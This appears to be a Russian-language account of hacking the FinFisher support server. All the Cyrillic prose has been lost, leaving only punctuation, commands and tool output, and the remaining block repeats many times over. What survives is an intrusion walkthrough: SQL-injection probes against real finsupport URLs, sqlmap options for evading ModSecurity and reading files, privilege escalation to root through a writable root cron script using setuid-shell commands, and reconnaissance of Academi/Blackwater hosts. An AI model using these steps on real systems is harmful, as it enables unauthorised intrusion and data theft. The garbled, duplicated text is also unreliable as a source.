, , , -. , , . .
, - : " , - , Gamma Group... "
, , , . :
Google: allinurl:"Scripts/scripts.js.php"
, SQL- , . , - Apache ModSecurity , sqlmap --tamper='tamper/modsecurityversioned.py'
, , PHP- ( JavaScript-) -.
, , .
. : , LFI, JavaScript-, - Location, .
finsupport . /BackOffice/
403 Forbidden , SQL- ( ). print.php
,
https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1 https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1
, print.php
, . ! MySQL . , magicquotes
, MySQL- INTO OUTFILE
. , sqlmap --file-read
PHP- URL -, HTML-, PHP- HTML-, .
, , , . , .
( )
___________ < got r00t? > ----------- \ ^__^ \ (oo)\_______ (__)\ )\/\ ||----w | || || ^^^^^^^^^^^^^^^^
root 50% Linux- : Linux_Exploit_Suggester unix-privesc-check .
finsupport
Debian, , unix-privesc-check
:
WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user www-data can write to /etc/cron.hourly/mgmtlicensestatus WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data can write to /etc/cron.hourly/webalizer
/etc/cron.hourly/webalizer :
chown root:root /path/to/my_setuid_shell chmod 04755 /path/to/my_setuid_shell
, ... . , cron
. webalizer
, , . , cron
, , cron
. ls -l /etc/localtime
, 6- , webalizer
, , , . , , , - , , . Root- , .
, . , , . nmap
. nse- nfs-*
smb-*
. finsupport - -, qateam
, .
, . . . :
Gamma FinSpy FinSpy C&C , C&C - , , C&C - FinFisher C&C - DDoS- Gamma Group .
Gamma , , FinSpy , , , , Twitter-.
: , GPU FinSpy-PC+Mobile-2012-07-12-Final.zip (magnet-, 38,7 ) , !
, , , . , .
1) -, Java , Flash Microsoft Office email-, . , / Java / Flash .
, , , 0day- FinSploit VUPEN , . -, . Metasploit-browser autopwn -, , , , Flash -.
2) , 95% , . : " ". , , , .
40 . , PGP- , . GitHub, : https://github.com/FinFisher .
:
Hacker News Reddit
https://www.pentesterlab.com/exercises/ http://overthewire.org/wargames/ http://www.hackthissite.org/ http://smashthestack.org/ http://www.win.tue.nl/~aeb/linux/hh/hh.html http://www.phrack.com/ http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/ https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers ( ) https://www.corelan.be/ ( Exploit writing tutorial part 1) http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/ http://www.dest-unreach.org/socat/
:
The Web Application Hacker's Handbook Hacking: The Art of Exploitation The Database Hacker's Handbook The Art of Software Security Assessment A Bug Hunter's Diary Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier TCP/IP Illustrated
C:\Documents and Settings\\Local Settings\Temp\ - . Dynamic forking (Process hollowing), , . ( , ). MBR . C:\Windows\Installer\{49FD463C-18F1-63C4-8F12-49F518F127}
, , , ( -), Skype . IP ( 77.69.140.194) 22, 53, 80, 443, 4111 ( - ).
:
40 Skype (, , , , ) (email, , VoIP) - (Windows, Mac OSX Linux)
, FinFisher . , , .
. , - -. .
.
, - - , :
Truecrypt 7.1a . Whonix . Debian, Tor. , Whonix Tor, - , -. aircrack-ng reaver, cantenna.
Whonix, - , , , - . - .
: , Tor. , -, - nmap, sqlmap nikto, , Tor . VPS. Tor , , , .
fierce , whois- IP- .
Blackwater. - (academi.com). :
fierce.pl -dns academi.com 67.238.84.228 email.academi.com 67.238.84.242 extranet.academi.com 67.238.84.240 mail.academi.com 67.238.84.230 secure.academi.com 67.238.84.227 vault.academi.com 54.243.51.249 www.academi.com
whois- www.academi.com
, Amazon Web Service.
NetRange: 67.238.84.224 - 67.238.84.255 CIDR: 67.238.84.224/27 CustName: Blackwater USA Address: 850 Puddin Ridge Rd
whois- academi.com
, ( 850 Puddin Ridge Rd ), whois-. , , Google:
"850 Puddin Ridge Rd" inurl:ip-address-lookup "850 Puddin Ridge Rd" inurl:domaintools
IP-, fierce.pl
, fierce.pl -dns
- IP-. , , .
Google . , academi.com
, - :
54.236.143.203 careers.academi.com 67.132.195.12 academiproshop.com 67.238.84.236 te.academi.com 67.238.84.238 property.academi.com 67.238.84.241 teams.academi.com
whois- , academiproshop.com
, .
FinFisher finsupport.finfisher.com
whois- finfisher.com
, " FinFisher GmbH ". "FinFisher GmbH" inurl:domaintools
gamma-international.de
, finsupport.finfisher.com
.
, . , , , , .
nmap- IP- . SNMP-.
:
-, ? , , , URL IP . fierce
git-, git.companyname.come/gitweb/
. ? , FTP-, . . (VOIP-, IP-, ...) . ?
- . , , nmap , :
-. fierce
, , test.company.com
dev.company.com
, . nikto . webserver/.svn/
, webserver/backup/
, webserver/phpinfo.php
. , . WhatWeb . , wpscan , CMS-Explorer Joomscan . , . , . - - , , . ZAP . . , . , . , , ( ), Google , .
finsupport.finfisher.com
:
nikto
. . . SQL-. WhatWeb . WhatWeb , , , - , Gamma , ? , URL, ( index.php
, , ). Scripts/scripts.js.php
Google: allinurl:"Scripts/scripts.js.php"
, , , -. , , . .
, - : " , - , Gamma Group... "
, , , . :
Google: allinurl:"Scripts/scripts.js.php"
, SQL- , . , - Apache ModSecurity , sqlmap --tamper='tamper/modsecurityversioned.py'
, , PHP- ( JavaScript-) -.
, , .
. : , LFI, JavaScript-, - Location, .
finsupport . /BackOffice/
403 Forbidden , SQL- ( ). print.php
,
https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1 https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1
, print.php
, . ! MySQL . , magicquotes
, MySQL- INTO OUTFILE
. , sqlmap --file-read
PHP- URL -, HTML-, PHP- HTML-, .
, , , . , .
( )
___________ < got r00t? > ----------- \ ^__^ \ (oo)\_______ (__)\ )\/\ ||----w | || || ^^^^^^^^^^^^^^^^
root 50% Linux- : Linux_Exploit_Suggester unix-privesc-check .
finsupport
Debian, , unix-privesc-check
:
WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user www-data can write to /etc/cron.hourly/mgmtlicensestatus WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data can write to /etc/cron.hourly/webalizer
/etc/cron.hourly/webalizer :
chown root:root /path/to/my_setuid_shell chmod 04755 /path/to/my_setuid_shell
, ... . , cron
. webalizer
, , . , cron
, , cron
. ls -l /etc/localtime
, 6- , webalizer
, , , . , , , - , , . Root- , .
, . , , . nmap
. nse- nfs-*
smb-*
. finsupport - -, qateam
, .
, . . . :
Gamma FinSpy FinSpy C&C , C&C - , , C&C - FinFisher C&C - DDoS- Gamma Group .
Gamma , , FinSpy , , , , Twitter-.
: , GPU FinSpy-PC+Mobile-2012-07-12-Final.zip (magnet-, 38,7 ) , !
, , , . , .
1) -, Java , Flash Microsoft Office email-, . , / Java / Flash .
, , , 0day- FinSploit VUPEN , . -, . Metasploit-browser autopwn -, , , , Flash -.
2) , 95% , . : " ". , , , .
40 . , PGP- , . GitHub, : https://github.com/FinFisher .
:
Hacker News Reddit
https://www.pentesterlab.com/exercises/ http://overthewire.org/wargames/ http://www.hackthissite.org/ http://smashthestack.org/ http://www.win.tue.nl/~aeb/linux/hh/hh.html http://www.phrack.com/ http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/ https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers ( ) https://www.corelan.be/ ( Exploit writing tutorial part 1) http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/ http://www.dest-unreach.org/socat/
:
The Web Application Hacker's Handbook Hacking: The Art of Exploitation The Database Hacker's Handbook The Art of Software Security Assessment A Bug Hunter's Diary Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier TCP/IP Illustrated
C:\Documents and Settings\\Local Settings\Temp\ - . Dynamic forking (Process hollowing), , . ( , ). MBR . C:\Windows\Installer\{49FD463C-18F1-63C4-8F12-49F518F127}
, , , ( -), Skype . IP ( 77.69.140.194) 22, 53, 80, 443, 4111 ( - ).
:
40 Skype (, , , , ) (email, , VoIP) - (Windows, Mac OSX Linux)
, FinFisher . , , .
. , - -. .
.
, - - , :
Truecrypt 7.1a . Whonix . Debian, Tor. , Whonix Tor, - , -. aircrack-ng reaver, cantenna.
Whonix, - , , , - . - .
: , Tor. , -, - nmap, sqlmap nikto, , Tor . VPS. Tor , , , .
fierce , whois- IP- .
Blackwater. - (academi.com). :
fierce.pl -dns academi.com 67.238.84.228 email.academi.com 67.238.84.242 extranet.academi.com 67.238.84.240 mail.academi.com 67.238.84.230 secure.academi.com 67.238.84.227 vault.academi.com 54.243.51.249 www.academi.com
whois- www.academi.com
, Amazon Web Service.
NetRange: 67.238.84.224 - 67.238.84.255 CIDR: 67.238.84.224/27 CustName: Blackwater USA Address: 850 Puddin Ridge Rd
whois- academi.com
, ( 850 Puddin Ridge Rd ), whois-. , , Google:
"850 Puddin Ridge Rd" inurl:ip-address-lookup "850 Puddin Ridge Rd" inurl:domaintools
IP-, fierce.pl
, fierce.pl -dns
- IP-. , , .
Google . , academi.com
, - :
54.236.143.203 careers.academi.com 67.132.195.12 academiproshop.com 67.238.84.236 te.academi.com 67.238.84.238 property.academi.com 67.238.84.241 teams.academi.com
whois- , academiproshop.com
, .
FinFisher finsupport.finfisher.com
whois- finfisher.com
, " FinFisher GmbH ". "FinFisher GmbH" inurl:domaintools
gamma-international.de
, finsupport.finfisher.com
.
, . , , , , .
nmap- IP- . SNMP-.
:
-, ? , , , URL IP . fierce
git-, git.companyname.come/gitweb/
. ? , FTP-, . . (VOIP-, IP-, ...) . ?
- . , , nmap , :
-. fierce
, , test.company.com
dev.company.com
, . nikto . webserver/.svn/
, webserver/backup/
, webserver/phpinfo.php
. , . WhatWeb . , wpscan , CMS-Explorer Joomscan . , . , . - - , , . ZAP . . , . , . , , ( ), Google , .
finsupport.finfisher.com
:
nikto
. . . SQL-. WhatWeb . WhatWeb , , , - , Gamma , ? , URL, ( index.php
, , ). Scripts/scripts.js.php
Google: allinurl:"Scripts/scripts.js.php"
, , , -. , , . .
, - : " , - , Gamma Group... "
, , , . :
Google: allinurl:"Scripts/scripts.js.php"
, SQL- , . , - Apache ModSecurity , sqlmap --tamper='tamper/modsecurityversioned.py'
, , PHP- ( JavaScript-) -.
, , .
. : , LFI, JavaScript-, - Location, .
finsupport . /BackOffice/
403 Forbidden , SQL- ( ). print.php
,
https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1 https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1
, print.php
, . ! MySQL . , magicquotes
, MySQL- INTO OUTFILE
. , sqlmap --file-read
PHP- URL -, HTML-, PHP- HTML-, .
, , , . , .
( )
___________ < got r00t? > ----------- \ ^__^ \ (oo)\_______ (__)\ )\/\ ||----w | || || ^^^^^^^^^^^^^^^^
root 50% Linux- : Linux_Exploit_Suggester unix-privesc-check .
finsupport
Debian, , unix-privesc-check
:
WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user www-data can write to /etc/cron.hourly/mgmtlicensestatus WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data can write to /etc/cron.hourly/webalizer
/etc/cron.hourly/webalizer :
chown root:root /path/to/my_setuid_shell chmod 04755 /path/to/my_setuid_shell
, ... . , cron
. webalizer
, , . , cron
, , cron
. ls -l /etc/localtime
, 6- , webalizer
, , , . , , , - , , . Root- , .
, . , , . nmap
. nse- nfs-*
smb-*
. finsupport - -, qateam
, .
, . . . :
Gamma FinSpy FinSpy C&C , C&C - , , C&C - FinFisher C&C - DDoS- Gamma Group .
Gamma , , FinSpy , , , , Twitter-.
: , GPU FinSpy-PC+Mobile-2012-07-12-Final.zip (magnet-, 38,7 ) , !
, , , . , .
1) -, Java , Flash Microsoft Office email-, . , / Java / Flash .
, , , 0day- FinSploit VUPEN , . -, . Metasploit-browser autopwn -, , , , Flash -.
2) , 95% , . : " ". , , , .
40 . , PGP- , . GitHub, : https://github.com/FinFisher .
:
Hacker News Reddit
https://www.pentesterlab.com/exercises/ http://overthewire.org/wargames/ http://www.hackthissite.org/ http://smashthestack.org/ http://www.win.tue.nl/~aeb/linux/hh/hh.html http://www.phrack.com/ http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/ https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers ( ) https://www.corelan.be/ ( Exploit writing tutorial part 1) http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/ http://www.dest-unreach.org/socat/
:
The Web Application Hacker's Handbook Hacking: The Art of Exploitation The Database Hacker's Handbook The Art of Software Security Assessment A Bug Hunter's Diary Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier TCP/IP Illustrated
C:\Documents and Settings\\Local Settings\Temp\ - . Dynamic forking (Process hollowing), , . ( , ). MBR . C:\Windows\Installer\{49FD463C-18F1-63C4-8F12-49F518F127}
, , , ( -), Skype . IP ( 77.69.140.194) 22, 53, 80, 443, 4111 ( - ).
:
40 Skype (, , , , ) (email, , VoIP) - (Windows, Mac OSX Linux)
, FinFisher . , , .
. , - -. .
.
, - - , :
Truecrypt 7.1a . Whonix . Debian, Tor. , Whonix Tor, - , -. aircrack-ng reaver, cantenna.
Whonix, - , , , - . - .
: , Tor. , -, - nmap, sqlmap nikto, , Tor . VPS. Tor , , , .
fierce , whois- IP- .
Blackwater. - (academi.com). :
fierce.pl -dns academi.com 67.238.84.228 email.academi.com 67.238.84.242 extranet.academi.com 67.238.84.240 mail.academi.com 67.238.84.230 secure.academi.com 67.238.84.227 vault.academi.com 54.243.51.249 www.academi.com
whois- www.academi.com
, Amazon Web Service.
NetRange: 67.238.84.224 - 67.238.84.255 CIDR: 67.238.84.224/27 CustName: Blackwater USA Address: 850 Puddin Ridge Rd
whois- academi.com
, ( 850 Puddin Ridge Rd ), whois-. , , Google:
"850 Puddin Ridge Rd" inurl:ip-address-lookup "850 Puddin Ridge Rd" inurl:domaintools
IP-, fierce.pl
, fierce.pl -dns
- IP-. , , .
Google . , academi.com
, - :
54.236.143.203 careers.academi.com 67.132.195.12 academiproshop.com 67.238.84.236 te.academi.com 67.238.84.238 property.academi.com 67.238.84.241 teams.academi.com
whois- , academiproshop.com
, .
FinFisher finsupport.finfisher.com
whois- finfisher.com
, " FinFisher GmbH ". "FinFisher GmbH" inurl:domaintools
gamma-international.de
, finsupport.finfisher.com
.
, . , , , , .
nmap- IP- . SNMP-.
:
-, ? , , , URL IP . fierce
git-, git.companyname.come/gitweb/
. ? , FTP-, . . (VOIP-, IP-, ...) . ?
- . , , nmap , :
-. fierce
, , test.company.com
dev.company.com
, . nikto . webserver/.svn/
, webserver/backup/
, webserver/phpinfo.php
. , . WhatWeb . , wpscan , CMS-Explorer Joomscan . , . , . - - , , . ZAP . . , . , . , , ( ), Google , .
finsupport.finfisher.com
:
nikto
. . . SQL-. WhatWeb . WhatWeb , , , - , Gamma , ? , URL, ( index.php
, , ). Scripts/scripts.js.php
Google: allinurl:"Scripts/scripts.js.php"
, , , -. , , . .
, - : " , - , Gamma Group... "
, , , . :
Google: allinurl:"Scripts/scripts.js.php"
, SQL- , . , - Apache ModSecurity , sqlmap --tamper='tamper/modsecurityversioned.py'
, , PHP- ( JavaScript-) -.
, , .
. : , LFI, JavaScript-, - Location, .
finsupport . /BackOffice/
403 Forbidden , SQL- ( ). print.php
,
https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1 https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1
, print.php
, . ! MySQL . , magicquotes
, MySQL- INTO OUTFILE
. , sqlmap --file-read
PHP- URL -, HTML-, PHP- HTML-, .
, , , . , .
( )
___________ < got r00t? > ----------- \ ^__^ \ (oo)\_______ (__)\ )\/\ ||----w | || || ^^^^^^^^^^^^^^^^
root 50% Linux- : Linux_Exploit_Suggester unix-privesc-check .
finsupport
Debian, , unix-privesc-check
:
WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user www-data can write to /etc/cron.hourly/mgmtlicensestatus WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data can write to /etc/cron.hourly/webalizer
/etc/cron.hourly/webalizer :
chown root:root /path/to/my_setuid_shell chmod 04755 /path/to/my_setuid_shell
, ... . , cron
. webalizer
, , . , cron
, , cron
. ls -l /etc/localtime
, 6- , webalizer
, , , . , , , - , , . Root- , .
, . , , . nmap
. nse- nfs-*
smb-*
. finsupport - -, qateam
, .
, . . . :
Gamma FinSpy FinSpy C&C , C&C - , , C&C - FinFisher C&C - DDoS- Gamma Group .
Gamma , , FinSpy , , , , Twitter-.
: , GPU FinSpy-PC+Mobile-2012-07-12-Final.zip (magnet-, 38,7 ) , !
, , , . , .
1) -, Java , Flash Microsoft Office email-, . , / Java / Flash .
, , , 0day- FinSploit VUPEN , . -, . Metasploit-browser autopwn -, , , , Flash -.
2) , 95% , . : " ". , , , .
40 . , PGP- , . GitHub, : https://github.com/FinFisher .
:
Hacker News Reddit
https://www.pentesterlab.com/exercises/ http://overthewire.org/wargames/ http://www.hackthissite.org/ http://smashthestack.org/ http://www.win.tue.nl/~aeb/linux/hh/hh.html http://www.phrack.com/ http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/ https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers ( ) https://www.corelan.be/ ( Exploit writing tutorial part 1) http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/ http://www.dest-unreach.org/socat/
:
The Web Application Hacker's Handbook Hacking: The Art of Exploitation The Database Hacker's Handbook The Art of Software Security Assessment A Bug Hunter's Diary Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier TCP/IP Illustrated
C:\Documents and Settings\\Local Settings\Temp\ - . Dynamic forking (Process hollowing), , . ( , ). MBR . C:\Windows\Installer\{49FD463C-18F1-63C4-8F12-49F518F127}
, , , ( -), Skype . IP ( 77.69.140.194) 22, 53, 80, 443, 4111 ( - ).
:
40 Skype (, , , , ) (email, , VoIP) - (Windows, Mac OSX Linux)
, FinFisher . , , .
. , - -. .
.
, - - , :
Truecrypt 7.1a . Whonix . Debian, Tor. , Whonix Tor, - , -. aircrack-ng reaver, cantenna.
Whonix, - , , , - . - .
: , Tor. , -, - nmap, sqlmap nikto, , Tor . VPS. Tor , , , .
fierce , whois- IP- .
Blackwater. - (academi.com). :
fierce.pl -dns academi.com 67.238.84.228 email.academi.com 67.238.84.242 extranet.academi.com 67.238.84.240 mail.academi.com 67.238.84.230 secure.academi.com 67.238.84.227 vault.academi.com 54.243.51.249 www.academi.com
whois- www.academi.com
, Amazon Web Service.
NetRange: 67.238.84.224 - 67.238.84.255 CIDR: 67.238.84.224/27 CustName: Blackwater USA Address: 850 Puddin Ridge Rd
whois- academi.com
, ( 850 Puddin Ridge Rd ), whois-. , , Google:
"850 Puddin Ridge Rd" inurl:ip-address-lookup "850 Puddin Ridge Rd" inurl:domaintools
IP-, fierce.pl
, fierce.pl -dns
- IP-. , , .
Google . , academi.com
, - :
54.236.143.203 careers.academi.com 67.132.195.12 academiproshop.com 67.238.84.236 te.academi.com 67.238.84.238 property.academi.com 67.238.84.241 teams.academi.com
whois- , academiproshop.com
, .
FinFisher finsupport.finfisher.com
whois- finfisher.com
, " FinFisher GmbH ". "FinFisher GmbH" inurl:domaintools
gamma-international.de
, finsupport.finfisher.com
.
, . , , , , .
nmap- IP- . SNMP-.
:
-, ? , , , URL IP . fierce
git-, git.companyname.come/gitweb/
. ? , FTP-, . . (VOIP-, IP-, ...) . ?
- . , , nmap , :
-. fierce
, , test.company.com
dev.company.com
, . nikto . webserver/.svn/
, webserver/backup/
, webserver/phpinfo.php
. , . WhatWeb . , wpscan , CMS-Explorer Joomscan . , . , . - - , , . ZAP . . , . , . , , ( ), Google , .
finsupport.finfisher.com
:
nikto
. . . SQL-. WhatWeb . WhatWeb , , , - , Gamma , ? , URL, ( index.php
, , ). Scripts/scripts.js.php
Google: allinurl:"Scripts/scripts.js.php"
, , , -. , , . .
, - : " , - , Gamma Group... "
, , , . :
Google: allinurl:"Scripts/scripts.js.php"
, SQL- , . , - Apache ModSecurity , sqlmap --tamper='tamper/modsecurityversioned.py'
, , PHP- ( JavaScript-) -.
, , .
. : , LFI, JavaScript-, - Location, .
finsupport . /BackOffice/
403 Forbidden , SQL- ( ). print.php
,
https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1 https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1
, print.php
, . ! MySQL . , magicquotes
, MySQL- INTO OUTFILE
. , sqlmap --file-read
PHP- URL -, HTML-, PHP- HTML-, .
, , , . , .
( )
___________ < got r00t? > ----------- \ ^__^ \ (oo)\_______ (__)\ )\/\ ||----w | || || ^^^^^^^^^^^^^^^^
root 50% Linux- : Linux_Exploit_Suggester unix-privesc-check .
finsupport
Debian, , unix-privesc-check
:
WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user www-data can write to /etc/cron.hourly/mgmtlicensestatus WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data can write to /etc/cron.hourly/webalizer
/etc/cron.hourly/webalizer :
chown root:root /path/to/my_setuid_shell chmod 04755 /path/to/my_setuid_shell
, ... . , cron
. webalizer
, , . , cron
, , cron
. ls -l /etc/localtime
, 6- , webalizer
, , , . , , , - , , . Root- , .
, . , , . nmap
. nse- nfs-*
smb-*
. finsupport - -, qateam
, .
, . . . :
Gamma FinSpy FinSpy C&C , C&C - , , C&C - FinFisher C&C - DDoS- Gamma Group .
Gamma , , FinSpy , , , , Twitter-.
: , GPU FinSpy-PC+Mobile-2012-07-12-Final.zip (magnet-, 38,7 ) , !
, , , . , .
1) -, Java , Flash Microsoft Office email-, . , / Java / Flash .
, , , 0day- FinSploit VUPEN , . -, . Metasploit-browser autopwn -, , , , Flash -.
2) , 95% , . : " ". , , , .
40 . , PGP- , . GitHub, : https://github.com/FinFisher .
:
Hacker News Reddit
https://www.pentesterlab.com/exercises/ http://overthewire.org/wargames/ http://www.hackthissite.org/ http://smashthestack.org/ http://www.win.tue.nl/~aeb/linux/hh/hh.html http://www.phrack.com/ http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/ https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers ( ) https://www.corelan.be/ ( Exploit writing tutorial part 1) http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/ http://www.dest-unreach.org/socat/
:
The Web Application Hacker's Handbook
Hacking: The Art of Exploitation
The Database Hacker's Handbook
The Art of Software Security Assessment
A Bug Hunter's Diary
Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier
TCP/IP Illustrated
C:\Documents and Settings\\Local Settings\Temp\ - . Dynamic forking (Process hollowing), , . ( , ). MBR . C:\Windows\Installer\{49FD463C-18F1-63C4-8F12-49F518F127}
, , , ( -), Skype . IP ( 77.69.140.194) 22, 53, 80, 443, 4111 ( - ).
:
40 Skype (, , , , ) (email, , VoIP) - (Windows, Mac OSX Linux)
, FinFisher . , , .
. , - -. .
.
, - - , :
Truecrypt 7.1a . Whonix . Debian, Tor. , Whonix Tor, - , -. aircrack-ng reaver, cantenna.
Whonix, - , , , - . - .
: , Tor. , -, - nmap, sqlmap nikto, , Tor . VPS. Tor , , , .
fierce , whois- IP- .
Blackwater. - (academi.com). :
fierce.pl -dns academi.com 67.238.84.228 email.academi.com 67.238.84.242 extranet.academi.com 67.238.84.240 mail.academi.com 67.238.84.230 secure.academi.com 67.238.84.227 vault.academi.com 54.243.51.249 www.academi.com
whois- www.academi.com
, Amazon Web Service.
NetRange: 67.238.84.224 - 67.238.84.255 CIDR: 67.238.84.224/27 CustName: Blackwater USA Address: 850 Puddin Ridge Rd
whois- academi.com
, ( 850 Puddin Ridge Rd ), whois-. , , Google:
"850 Puddin Ridge Rd" inurl:ip-address-lookup "850 Puddin Ridge Rd" inurl:domaintools
IP-, fierce.pl
, fierce.pl -dns
- IP-. , , .
Google . , academi.com
, - :
54.236.143.203 careers.academi.com 67.132.195.12 academiproshop.com 67.238.84.236 te.academi.com 67.238.84.238 property.academi.com 67.238.84.241 teams.academi.com
whois- , academiproshop.com
, .
FinFisher finsupport.finfisher.com
whois- finfisher.com
, " FinFisher GmbH ". "FinFisher GmbH" inurl:domaintools
gamma-international.de
, finsupport.finfisher.com
.
, . , , , , .
nmap- IP- . SNMP-.
:
-, ? , , , URL IP . fierce
git-, git.companyname.come/gitweb/
. ? , FTP-, . . (VOIP-, IP-, ...) . ?
- . , , nmap , :
-. fierce
, , test.company.com
dev.company.com
, . nikto . webserver/.svn/
, webserver/backup/
, webserver/phpinfo.php
. , . WhatWeb . , wpscan , CMS-Explorer Joomscan . , . , . - - , , . ZAP . . , . , . , , ( ), Google , .
finsupport.finfisher.com
:
nikto
. . . SQL-. WhatWeb . WhatWeb , , , - , Gamma , ? , URL, ( index.php
, , ). Scripts/scripts.js.php
Google: allinurl:"Scripts/scripts.js.php"
, , , -. , , . .
, - : " , - , Gamma Group... "
, , , . :
Google: allinurl:"Scripts/scripts.js.php"
, SQL- , . , - Apache ModSecurity , sqlmap --tamper='tamper/modsecurityversioned.py'
, , PHP- ( JavaScript-) -.
, , .
. : , LFI, JavaScript-, - Location, .
finsupport . /BackOffice/
403 Forbidden , SQL- ( ). print.php
,
https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1 https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1
, print.php
, . ! MySQL . , magicquotes
, MySQL- INTO OUTFILE
. , sqlmap --file-read
PHP- URL -, HTML-, PHP- HTML-, .
, , , . , .
( )
___________ < got r00t? > ----------- \ ^__^ \ (oo)\_______ (__)\ )\/\ ||----w | || || ^^^^^^^^^^^^^^^^
root 50% Linux- : Linux_Exploit_Suggester unix-privesc-check .
finsupport
Debian, , unix-privesc-check
:
WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user www-data can write to /etc/cron.hourly/mgmtlicensestatus WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data can write to /etc/cron.hourly/webalizer
/etc/cron.hourly/webalizer :
chown root:root /path/to/my_setuid_shell chmod 04755 /path/to/my_setuid_shell
, ... . , cron
. webalizer
, , . , cron
, , cron
. ls -l /etc/localtime
, 6- , webalizer
, , , . , , , - , , . Root- , .
, . , , . nmap
. nse- nfs-*
smb-*
. finsupport - -, qateam
, .
, . . . :
Gamma FinSpy FinSpy C&C , C&C - , , C&C - FinFisher C&C - DDoS- Gamma Group .
Gamma , , FinSpy , , , , Twitter-.
: , GPU FinSpy-PC+Mobile-2012-07-12-Final.zip (magnet-, 38,7 ) , !
, , , . , .
1) -, Java , Flash Microsoft Office email-, . , / Java / Flash .
, , , 0day- FinSploit VUPEN , . -, . Metasploit-browser autopwn -, , , , Flash -.
2) , 95% , . : " ". , , , .
40 . , PGP- , . GitHub, : https://github.com/FinFisher .
:
Hacker News Reddit
https://www.pentesterlab.com/exercises/ http://overthewire.org/wargames/ http://www.hackthissite.org/ http://smashthestack.org/ http://www.win.tue.nl/~aeb/linux/hh/hh.html http://www.phrack.com/ http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/ https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers ( ) https://www.corelan.be/ ( Exploit writing tutorial part 1) http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/ http://www.dest-unreach.org/socat/
:
The Web Application Hacker's Handbook Hacking: The Art of Exploitation The Database Hacker's Handbook The Art of Software Security Assessment A Bug Hunter's Diary Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier TCP/IP Illustrated
C:\Documents and Settings\\Local Settings\Temp\ - . Dynamic forking (Process hollowing), , . ( , ). MBR . C:\Windows\Installer\{49FD463C-18F1-63C4-8F12-49F518F127}
, , , ( -), Skype . IP ( 77.69.140.194) 22, 53, 80, 443, 4111 ( - ).
:
40 Skype (, , , , ) (email, , VoIP) - (Windows, Mac OSX Linux)
, FinFisher . , , .
. , - -. .
.
, - - , :
Truecrypt 7.1a . Whonix . Debian, Tor. , Whonix Tor, - , -. aircrack-ng reaver, cantenna.
Whonix, - , , , - . - .
: , Tor. , -, - nmap, sqlmap nikto, , Tor . VPS. Tor , , , .
fierce , whois- IP- .
Blackwater. - (academi.com). :
fierce.pl -dns academi.com 67.238.84.228 email.academi.com 67.238.84.242 extranet.academi.com 67.238.84.240 mail.academi.com 67.238.84.230 secure.academi.com 67.238.84.227 vault.academi.com 54.243.51.249 www.academi.com
whois- www.academi.com
, Amazon Web Service.
NetRange: 67.238.84.224 - 67.238.84.255 CIDR: 67.238.84.224/27 CustName: Blackwater USA Address: 850 Puddin Ridge Rd
whois- academi.com
, ( 850 Puddin Ridge Rd ), whois-. , , Google:
"850 Puddin Ridge Rd" inurl:ip-address-lookup "850 Puddin Ridge Rd" inurl:domaintools
IP-, fierce.pl
, fierce.pl -dns
- IP-. , , .
Google . , academi.com
, - :
